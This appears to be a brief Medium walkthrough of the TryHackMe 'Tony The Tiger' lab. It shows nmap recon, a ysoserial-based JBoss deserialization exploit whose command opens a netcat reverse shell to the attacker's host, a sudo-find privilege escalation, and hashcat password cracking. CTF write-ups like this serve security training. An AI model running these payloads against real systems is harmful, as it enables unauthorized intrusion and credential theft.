TryHackMe — Tony The Tiger Walkthrough

Tony The Tiger

Task 1 Deploy

Task 2 Intro

Task 3 Recon

nmap -sC -sV -oN nmap {IP}
PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 1024 d6:97:8c:b9:74:d0:f3:9e:fe:f3:a5:ea:f8:a9:b5:7a (DSA)| 2048 33:a4:7b:91:38:58:50:30:89:2d:e4:57:bb:07:bb:2f (RSA)| 256 21:01:8b:37:f5:1e:2b:c5:57:f1:b0:42:b7:32:ab:ea (ECDSA)|_ 256 f6:36:07:3c:3b:3d:71:30:c4:cd:2a:13:00:b5:25:ae (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))|_http-generator: Hugo 0.66.0|_http-server-header: Apache/2.4.7 (Ubuntu)|_http-title: Tony's Blog
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1| http-methods: |_ Potentially risky methods: PUT DELETE TRACE|_http-server-header: Apache-Coyote/1.1|_http-title: Welcome to JBoss ASService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Task 4 Tony’s Flag

strings tony.jpg

Task 5 Exploit!

gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections5', args.command])
r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
nc -lvnp 8888
python exploit.py --ysoserial-path ysoserial.jar --proto http {IP}:8080 "nc {Self_IP} -e /bin/sh 8888"
python -c 'import pty; pty.spawn("/bin/bash")'

Task 6 Find User JBoss` flag

ssh jboss@{IP}

Task 7 Escalation!

sudo -l 
sudo find /etc/passwd -exec /bin/sh \;
hashid {HASH}
hashcat -a 0 -m 0 {HASH} /usr/share/wordlists/rockyou.txt

Final Thoughts

--

--

--

Software Developer at Loanboox

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to edit/update/change the image in Django

Google Cloud vs AWS: Picking the Right Cloud Provider

Google Cloud Platform vs aws

Stop Fearing the Whiteboard. Conquer It.

آموزش پیکربندی پروتکل 802.1Q و ISL:

Making a Chess App with Flutter

Clean Code

Why does your business need to hire dedicated developer?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Matheus Antunes de Jesus

Matheus Antunes de Jesus

Software Developer at Loanboox

More from Medium

HackTheBox -Paper (Walkthrough)

[ Hack The Box ] Devzat — Writeup

HTB Meow (Telnet)

DogCat — TryHackMe, WriteUp